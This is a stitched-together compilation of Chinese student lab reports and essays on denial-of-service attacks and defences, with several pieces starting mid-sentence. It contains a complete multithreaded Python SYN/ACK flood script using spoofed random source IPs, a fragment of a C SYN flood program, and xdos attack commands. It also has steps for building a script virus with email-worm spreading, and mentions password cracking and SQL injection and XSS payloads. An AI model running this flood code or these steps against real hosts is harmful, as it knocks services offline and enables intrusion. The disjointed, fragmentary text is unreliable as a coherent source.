网络攻击与防范-拒绝服务攻击实验
网络攻击实验报告

一、实验背景随着互联网技术的飞速发展,网络安全问题日益突出。
为了提高网络安全意识,掌握网络安全防护技能,我们进行了一次网络攻击实验。
本次实验旨在了解网络攻击的基本原理,熟悉常见的网络攻击手段,以及掌握相应的防御措施。
二、实验目的1. 理解网络攻击的基本原理和常见手段。
2. 掌握网络攻击实验的基本流程。
3. 熟悉网络安全防护技术,提高网络安全意识。
三、实验环境1. 操作系统:Windows 102. 网络设备:路由器、交换机、计算机3. 实验软件:Wireshark、Nmap、Metasploit等四、实验内容1. 漏洞扫描(1)使用Nmap扫描目标主机,发现潜在的安全漏洞。
(2)分析扫描结果,了解目标主机的开放端口和服务信息。
2. 拒绝服务攻击(DoS)(1)使用Metasploit生成大量的伪造请求,对目标主机进行DoS攻击。
(2)观察目标主机响应时间,分析攻击效果。
3. 口令破解(1)使用Hydra工具尝试破解目标主机的登录口令。
(2)观察破解过程,了解口令破解的原理。
4. 恶意代码传播(1)利用网络共享传播恶意代码,感染目标主机。
(2)分析恶意代码的传播过程,了解恶意代码的特点。
5. 数据窃取(1)使用网络监听工具,窃取目标主机传输的数据。
(2)分析窃取到的数据,了解数据窃取的原理。
五、实验结果与分析1. 漏洞扫描通过Nmap扫描,我们成功发现目标主机的开放端口和服务信息,发现了一些潜在的安全漏洞。
这为我们进行后续的攻击实验提供了依据。
2. 拒绝服务攻击(DoS)我们使用Metasploit生成了大量的伪造请求,对目标主机进行了DoS攻击。
观察目标主机的响应时间,发现攻击效果明显,目标主机无法正常响应服务。
3. 口令破解我们尝试破解目标主机的登录口令,使用Hydra工具进行暴力破解。
经过一段时间,成功破解了目标主机的口令。
4. 恶意代码传播我们利用网络共享传播恶意代码,成功感染了目标主机。
网络安全实验报告 - 拒绝服务攻击

一、实验目的
1.SYN洪水攻击
2.ICMP洪水攻击
二、实验内容与步骤
(1)SYN洪水攻击
对目标主机实施SYN洪水攻击的命令:nmap -v –sS -T5 靶机IP地址
(2)ICMP洪水攻击
启用实验平台ICMP洪水攻击工具
三、实验小结
SYN洪水攻击和ICMP洪水攻击尽管都能实现洪水攻击,但是二者的原理不同
1.SYN洪水攻击原理
在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发送SYN+ACK应答报文后是无法收到客户端的ACK报文的,即第三次握手无法完成,成为半连接状态。
这种情况下服务器端一般会新开一个等待线程来负责等待一段时间(SYN Timeout),而服务器里面用来存放等待线程的堆栈一般不会很大。
因此黑客可以大量模拟这种情况,使服务器忙于处理这种半连接状态,最终等待堆栈溢出
2.ICMP洪水攻击原理
a..直接Flood
源IP就是黑客自己的IP,回应ICMP发回到黑客自己
b.伪造IP的Flood
伪造源IP
c.Smurf
结合IP地址欺骗和ICMP回复的方法,使大量回应报文发向攻击目标主机,引起攻击目标系统瘫痪。
实验4:拒绝式服务攻击与防范

实验4:拒绝式服务攻击与防范【实验目的】熟悉SYNflood的攻击原理与过程,及IPv4所存在的固有缺陷。
【实验准备】准备xdos.exe拒绝服务工具。
【注意事项】实验后将DoS黑客软件从机器彻底删除,避免恶意应用影响网络运行。
【实验步骤】一、拒绝式服务攻击拒绝服务攻击的英文意思是Denial of Service,简称DoS。
这种攻击行动使网站服务器充斥大量要求回复的信息,消耗网络带宽或系统资源,导致网络或系统不胜负荷直至瘫痪而停止提供正常的网络服务。
SYN-Flood是当前最常见的一种Dos攻击方式,它利用了TCP协议的缺陷进行攻击用黑客软件xdos.exe对目标计算机进行拒绝服务攻击并运行测试。
(1)计算机a登录到windows 2000,打开sniffer pro,在sniffer pro中配置好捕捉从任意主机发送给本机的ip数据包,并启动捕捉进程。
(2)在计算机B上登录Windows 2000,打开命令提示窗口,运行xdos.exe,命令的格式:‖xdos<目标主机IP>端口号–t 线程数[-s <插入随机IP>’]‖(也可以用―xdos?‖命令查看使用方法)。
输入命令:xdos 192.168.19.42 80 –t 200 –s* 确定即可进行攻击,192.168.19.42 是计算机A的地址。
(3)在A端可以看到电脑的处理速度明显下降,甚至瘫痪死机,在Sniffer Pro的Traffic Map 中看到最大伪造IP的主机请求与A的电脑建立连接。
(4)B停止攻击后,A的电脑恢复快速响应。
打开捕捉的数据包,可以看到有大量伪造IP地址的主机请求与A的电脑连接的数据包,且都是只请求不应答。
以至于A的电脑保持有大量的半开连接。
运行速度下降直至瘫痪死机,拒绝为合法的请求服务。
二、拒绝式服务防范几乎所有的主机平台都有抵御DoS的设置,常见的有以下几种。
(1)关闭不必要的服务。
实验10-拒绝服务攻击与防范资料

实验10-拒绝服务攻击与防范贵州大学实验报告学院:计算机科学与技术学院专业:信息安全班级:sizeof(tcpHeader));tcpHeader.th_sum=checksum((USHORT*)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));//把伪造好的IP头和 TCP 头放进 buf 准备发送memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));//发送数据包rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));if (rect==SOCKET_ERROR){printf("send error!:%x",WSAGetLastError());return false;}elseprintf("send ok!");Sleep(sleeptime); //根据自己网速的快慢确定此值,sleeptime越小发得越快}//endwhile //重新伪造IP的源地址等再次向目标发送closesocket(sock);WSACleanup();return 0;}4.运行代码得到如下可执行文件:5.攻击之前,将一台web服务器的服务端口改为1234,如下:6.访问上面的web服务器如下:7.DoS攻击:8.最后一个参数60,表示每60ms发送一次,回车后:9.每60 ms显示一个send ok!表示发送成功。
DoS攻击之后,访问之前的web服务器,出现如下情况:表明DOS攻击成功!(二)分布式服务(DDoS)攻击与防范C1(攻击者)上安装DDoS客户端程序,C2—C6(傀儡机)上安装DDoS服务器端,C7(被攻击者)上安装启用冰盾DDoS防火墙,C8(被攻击者)上不使用防火墙。
国家开放大学-—网络安全评价—实训2-拒绝服务攻击-TCP SYN Flood攻击与防御

信息安全与管理专业实训报告学生姓名:一、实训名称:拒绝服务攻击-TCP SYN Flood攻击与防御。
二、实训内容1、kali的安装部署2、SYN Flood攻击演示3、观察受攻击目标的系统状态4、防御措施三、实验步骤1、python攻击代码环境:ubuntu/kali +python 2.7.11使用方法如下:mode有三种模式syn攻击、ack攻击、混合攻击,虽说是支持多线程但是多个线程反而不如单线程快,估计是我的多线程弄得有些问题,麻烦这方面比较懂的朋友帮我指点一下。
我电脑是i7-6700单线程也只能这点速度。
cpu1已经使用89%了看一下抓包情况吧,因为只是测试用我也没带tcp的options字段,报文长度也不够64字节,不过也能传到目的地址。
下面是代码:#!/usr/bin/python#-*-coding:utf-8-*-import socketimport structimport randomimport threadingclass myThread (threading.Thread):def __init__(self,dstip,dstport,mode):threading.Thread.__init__(self)self.dstip = dstipself.dstport =dstportself.mode =modedef run(self):attack(self.dstip,self.dstport,self.mode)def checksum(data):s = 0n = len(data) % 2for i in range(0, len(data)-n, 2):s+= ord(data[i]) + (ord(data[i+1]) << 8) if n:s+= ord(data[i+1])while (s >> 16):s = (s & 0xFFFF) + (s >> 16)s = ~s & 0xffffreturn sdef IP(source,destination,udplen):version = 4ihl = 5tos = 0tl = 20+udplenip_id = random.randint(1,65535)flags = 0offset = 0ttl = 128protocol =6check =0source = socket.inet_aton(source)destination = socket.inet_aton(destination)ver_ihl = (version << 4)+ihlflags_offset = (flags << 13)+offsetip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,check,source,destination)check=checksum(ip_header)ip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,socket.htons(check),source,destination)return ip_headerdef TCP(srcip,dstip,protocol,dp,fg):source = socket.inet_aton(srcip)destination = socket.inet_aton(dstip)srcport=random.randint(1,65535)dstport=dpsyn_num=random.randint(1,4000000000)if fg == 2:ack_num=0else:ack_num=random.randint(1,4000000000) hlen=5zero=0flag=fgwindow=8192check=0point=0tcplen=hlenh_f=(hlen << 12)+flagTCP_head=struct.pack("!4s4sHHHHIIHHHH",source,destination,protocol,tcplen,srcport,dstport,s yn_num,ack_num,h_f,window,check,point)check=checksum(TCP_head)TCP_head=struct.pack("!HHIIHHHH",srcport,dstport,syn_num,ack_num,h_f,window,check,point )return TCP_headdef makepacket(dstip,dstport,fg):srcip=str(random.choice(ip_first))+'.'+str(random.randint(1,255))+'.'+str(random.randint(1,255))+'. '+str(random.randint(1,255))protocol=6ippacket=IP(srcip,dstip,5)+TCP(srcip,dstip,protocol,dstport,fg)return ippacketdef attack(dstip,dstport,mode):if mode == 'syn':fg=2while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'ack':fg=18while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'syn&ack':while 1:data=makepacket(dstip,dstport,2)s.sendto(data,(dstip,dstport))data=makepacket(dstip,dstport,18)s.sendto(data,(dstip,dstport))else:print 'DON\'T xia say!'dstip=raw_input('attack IP:')dstport=int(input('attack PORT:'))mode=raw_input('mode:(syn or ack or syn&ack)') threads=int(input("线程数threads:"))ip_first=[]for i in range(1,10):ip_first.append(i)for i in range(11,172):ip_first.append(i)for i in range(173,192):ip_first.append(i)for i in range(193,224):ip_first.append(i)s = socket.socket(socket.AF_INET,socket.SOCK_RAW,6) s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)threads_name=[]for i in range(threads):threads_name.append('teread'+str(i))for i in range(threads):threads_name[i]=myThread(dstip,dstport,mode)for i in range(threads):threads_name[i].start()2、C语言攻击代码环境:ubuntu/kali gcc version 6.1.1 20160802 (Debian 6.1.1-11)使用方法:支持两个参数目的ip和目的端口性能:限制发包速度的是带宽(我这是100M的网,除去报文的前导码和帧间隔极限速度差不多就是9m左右了),cpu利用才27%,我在1000Mbps的网速下测试,单线程的话速度能到40m左右,cpu占用率大约85%左右。
网络安全测试中的拒绝服务攻击与防范

网络安全测试中的拒绝服务攻击与防范网络安全在当今信息时代的重要性不言而喻,随着科技的快速发展,人们越来越依赖于网络进行各种活动。
然而,网络的普及也带来了一系列的安全威胁,其中之一就是拒绝服务攻击(Denial of Service,DoS)。
本文将探讨网络安全测试中的拒绝服务攻击与防范方法。
一、拒绝服务攻击的定义与原理拒绝服务攻击是指攻击者通过发送大量的请求,占用目标系统的全部或部分资源,导致合法用户无法正常访问该系统的情况。
攻击者通过消耗目标系统的带宽、计算资源或存储资源等方式,造成系统负载过高而无法响应合法用户的请求。
拒绝服务攻击的原理在于攻击者通过发送大量的恶意请求,耗尽目标系统的资源,从而引发系统崩溃或运行缓慢。
常见的拒绝服务攻击手段包括:泛洪攻击(Flood Attack)、碎片攻击(Fragmentation Attack)、应用层攻击(Application Layer Attack)等。
二、拒绝服务攻击的影响拒绝服务攻击给目标系统带来了严重的影响,其中包括以下几个方面:1. 网站瘫痪:拒绝服务攻击会导致目标网站无法正常运行,用户无法访问网站,给网站运营者带来巨大的经济损失。
2. 数据泄露:攻击者利用拒绝服务攻击的机会,可能获取并窃取系统中的重要数据,给用户和机构带来隐私泄露的风险。
3. 声誉受损:拒绝服务攻击会导致目标系统长时间不可用,使得用户对该系统的可靠性和稳定性产生质疑,进而对企业的声誉造成损害。
三、拒绝服务攻击的防范方法为了保护系统免受拒绝服务攻击的影响,需要采取一系列的防范措施。
下面是几种常见的防范方法:1. 增加带宽:通过增加带宽的方式,可以提高系统对大规模攻击的抵御能力。
这样系统能够更快地缓解攻击期间的负载压力。
2. 流量过滤:利用防火墙、入侵检测系统(IDS)等安全设备对流量进行过滤和识别,屏蔽恶意流量和异常请求,过滤掉拒绝服务攻击。
3. 负载均衡:通过负载均衡技术,将流量分散到多台服务器上,分摊压力,提高系统的稳定性和可靠性,从而减轻拒绝服务攻击的影响。
实验六_网络攻击与防范
《网络攻击与防范》实验报告(2)单击“下一步”按钮·进人如图 4-2 所示的“禁止功能选项”设定界面.根据需要进行设定。
例如。
如果选中“禁止右键菜单”复选框.当运行了该病毒后.右击时将无法弹出快捷菜单。
图 4-2 设置“禁止功能选项”(3)单击“下一步”按钮.进入如图 4-3 所示的“病毒提示对话框”设定界面时。
根据需要设置有关开机时病毒的执行情况。
当选中“设置开机提示对话框”复选框.并设置了提示框标题和内容等后,相关信息将以对话框方式在开机时自动显示图4-3 设置开机时病毒的执行情况(4)单击“下一步”按钮,进入如图 4-4 所示的“病毒传播选项”设定界面,根据需要进行设定。
当选中“通过电子邮件进行自动传播(蠕虫)”复选框时.病毒可以向指定数量的用户发送垃圾邮件。
图4-3 设置开机时病毒的执行情况下一步夏上一步图4-4“病毒传播选项”设定界面(5)单击“下一步”按钮,进入“IE 修改选项”设定界面,根据需要进行设定。
注意.当选中“设置默认主页”复选框后,会弹出“设置主页”对话框,需要读者输人要修改的IE 浏览器主页地址(即每次打开IE 浏览器时默认打开的主页地址).如图 4-5 所示图4-5设置IE浏览器修改选项(6)单击“下一步”按钮,在出现的如图 4-6 所示的对话框中选择所生成的脚本病毒存放的位置,单击“开始制造”按钮,生成病毒文件。
图4-6选择所生成的脚本病毒存放的位置此时,可看到相应路径下,已经生成了脚本病毒文件3.2感染病毒并观察感染后的系统变化情况(1)将生成的脚本病毒文件置于虚拟机中,在其上双击使之运行。
为保证完整准确地查看病毒的感染效果.可重启已经感染了病毒的虚拟机系统。
然后,根据病毒文件生成时的设置,观察系统感染了病毒后的表现情况。
主要操作步骤如下。
(2)观察系统文件夹下的异常变化,可以发现,在 C:\ Windows,C:\Windows\system32下多了不明来源的脚本文件。
网络安全攻击实验报告
网络安全攻击实验报告网络安全攻击实验报告一、实验目的:学习并熟悉网络安全攻击的基本原理和方法,了解网络安全防御的必要性。
二、实验内容:1. DDoS攻击实验:模拟分布式拒绝服务攻击,测试目标服务器的抗压能力。
2. SQL注入攻击实验:利用应用程序存在的漏洞,尝试执行恶意SQL语句,获取数据库敏感信息。
3. XSS攻击实验:使用恶意代码注入到网页中,盗取用户的敏感信息。
三、实验步骤:1. DDoS攻击实验:a. 配置并启动一台攻击服务器,使用DDoS攻击工具发送大量伪造IP地址的请求,模拟大规模的攻击流量。
b. 监测目标服务器的响应速度、可用性以及是否有部分服务宕机等情况。
c. 统计攻击期间服务器的流量数据,评估服务器的抗压能力。
2. SQL注入攻击实验:a. 检测目标应用程序是否存在SQL注入漏洞。
b. 使用SQL注入工具尝试执行注入攻击,如在输入框中输入恶意的SQL语句。
c. 观察并记录攻击是否成功,是否能够获取到数据库中的敏感信息。
3. XSS攻击实验:a. 检测目标网页中是否存在XSS漏洞。
b. 在可能存在漏洞的位置输入恶意的代码,如<script>alert('XSS')</script>。
c. 查看攻击是否成功,是否能够在用户浏览器中执行恶意代码。
四、实验结果:1. DDoS攻击实验:目标服务器在大规模的攻击流量下,响应速度明显减慢,部分服务无法正常访问,服务器的抗压能力较低。
2. SQL注入攻击实验:在存在SQL注入漏洞的应用程序上成功执行了注入攻击,获取到了数据库中的敏感信息。
3. XSS攻击实验:成功在目标网页中执行了恶意代码,弹出了一个恶意弹窗。
五、实验反思:1. 网络安全攻击实验过程中需要谨慎操作,避免对正常的网络环境和他人的利益造成伤害。
2. 攻击实验结果提示了目标服务器和应用程序存在的安全漏洞,验证了网络安全防御的重要性。
3. 需要提高网络安全意识,加强对网络安全攻击的防范和应对能力。
网络安全中的拒绝服务攻击与防范
网络安全中的拒绝服务攻击与防范随着网络应用的不断发展,网络安全已经成为当今社会不可忽视的问题。
网络安全攻击分为多种形式,其中最为常见的就是拒绝服务攻击(DDoS攻击)。
拒绝服务攻击指的是通过向目标服务器发送大量的请求,使其超过承受能力,导致服务器瘫痪或无法正常提供服务。
本文将从拒绝服务攻击的原理、影响以及防范措施三个方面展开讨论。
一、拒绝服务攻击的原理拒绝服务攻击的原理在于向目标服务器发起大量的请求,其目的是耗尽服务器的带宽、内存、CPU或其他资源,让服务器无法承受。
在攻击中,攻击者通常使用一些工具或程序,向目标服务器不断发送请求,造成许多非法数据流量。
这些非法数据流量会携带假冒的源IP地址,使得目标服务器很难对其发出的请求进行过滤和识别。
因此,当这些请求不断涌入服务器时,服务器会瘫痪,并迅速崩溃,无法继续向用户提供服务,导致网络服务中断。
二、拒绝服务攻击的影响拒绝服务攻击对用户和服务器都有很大的影响。
对于用户来说,由于攻击导致服务器无法正常运行,无法及时获得所需的服务,影响用户体验。
对于企业或机构来说,拒绝服务攻击导致的业务中断,可能会影响企业的形象和声誉,进而影响企业的经济利益。
对于高流量的网站来说,一次拒绝服务攻击可能会使其服务器由于过载而崩溃,从而导致网站无法访问,直接影响公司的形象和经济收益。
三、拒绝服务攻击的防范措施要想有效地防范拒绝服务攻击,必须采取多种方法。
以下是一些常用的防范措施:1. 加强网络安全体系建设。
改善网络安全防护能力,建立安全防护体系,根据公司的实际情况制定安全策略。
可以对安全防护系统进行全面升级,可能采用物理、虚拟或云防护组合,确保网络安全。
2. 增加网络带宽,提高服务器存储和处理能力。
通过增加网络带宽,提高服务器存储和处理能力,从根本上减缓攻击行为带来的破坏,确保系统能够正常运行。
这样有助于提高网络系统的负载处理及访问能力。
3. 进行合理的网络切割。
将网络划分为多个安全区域,设立防火墙、入侵检测系统(IDS)和安全事件管理系统(SIEM)等保护措施。
网络攻击的实验报告
一、实验背景随着信息技术的飞速发展,网络已经成为人们工作和生活中不可或缺的一部分。
然而,随之而来的网络安全问题也日益凸显。
为了提高对网络攻击的认识和防御能力,我们进行了本次网络攻击实验。
通过模拟网络攻击的过程,了解攻击者的攻击手段,以及防御网络攻击的方法。
二、实验目的1. 理解网络攻击的基本原理和常用手段。
2. 掌握网络安全防御的基本策略和工具。
3. 提高网络安全意识和自我保护能力。
三、实验环境1. 操作系统:Windows 102. 网络设备:路由器、交换机、PC机3. 软件环境:Wireshark、Nmap、Metasploit等网络安全工具四、实验步骤1. 信息收集利用Nmap扫描目标主机,获取目标主机的开放端口、操作系统等信息。
通过Wireshark抓取目标主机与网络之间的数据包,分析其网络流量。
2. 漏洞扫描利用Nmap对目标主机进行漏洞扫描,找出目标主机存在的安全漏洞。
3. 攻击模拟根据漏洞扫描结果,选择合适的攻击手段对目标主机进行攻击。
以下列举几种常见的网络攻击手段:(1)端口扫描攻击:通过扫描目标主机的开放端口,获取目标主机上的服务信息。
(2)拒绝服务攻击(DoS):通过大量请求占用目标主机资源,使目标主机无法正常响应。
(3)密码破解攻击:通过暴力破解、字典攻击等方法获取目标主机的登录凭证。
(4)木马攻击:通过植入木马程序,控制目标主机,获取敏感信息。
4. 攻击防御针对攻击模拟过程中发现的安全漏洞,采取相应的防御措施,如:(1)关闭不必要的开放端口,减少攻击面。
(2)更新操作系统和应用程序,修复已知漏洞。
(3)设置强密码,提高登录凭证的安全性。
(4)安装防火墙、入侵检测系统等安全设备,及时发现和阻止攻击。
五、实验结果与分析1. 通过信息收集,我们发现目标主机存在多个开放端口,其中包含Web服务、邮件服务、数据库服务等。
2. 漏洞扫描结果显示,目标主机存在多个安全漏洞,如:Web服务漏洞、数据库服务漏洞等。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
华北电力大学
实验报告|
|
实验名称拒绝服务攻击实验
课程名称网络攻击与防范
|
|
专业班级:网络学生姓名:
学号:成绩:
指导教师:曹锦纲实验日期:
3、此时打开百度页面,可以看到能抓到所有发给PC2的ip数据包。
4、在PC1上打开XDos.exe,命令的格式为:xdos <目标主机IP> 端口号 -t 线程数 [-s <插入随机IP>]。
输入命令:xdos 192.168.137.3 80 -t 200 -s*,回车即可攻击,192.168.137.3是PC2的IP地址。
5、在PC2中可以看到大量伪造IP地址的主机请求与PC2的电脑建立连接。
且能通过捕捉到的数据包看到都是只请求不应答,以至于PC2保持有大量的半开连接。
6、停止攻击后,PC2不再接收到数据包。
五、拒绝式服务防范
几乎所有的主机平台都有抵御DoS的设置,常见的有以下几种:
(1)关闭不必要的服务。
(2)限制同时打开的Syn半连接数目。
(3)缩短Syn半连接的time out时间。
(4)及时更新系统补丁.
六、实验心得与体会。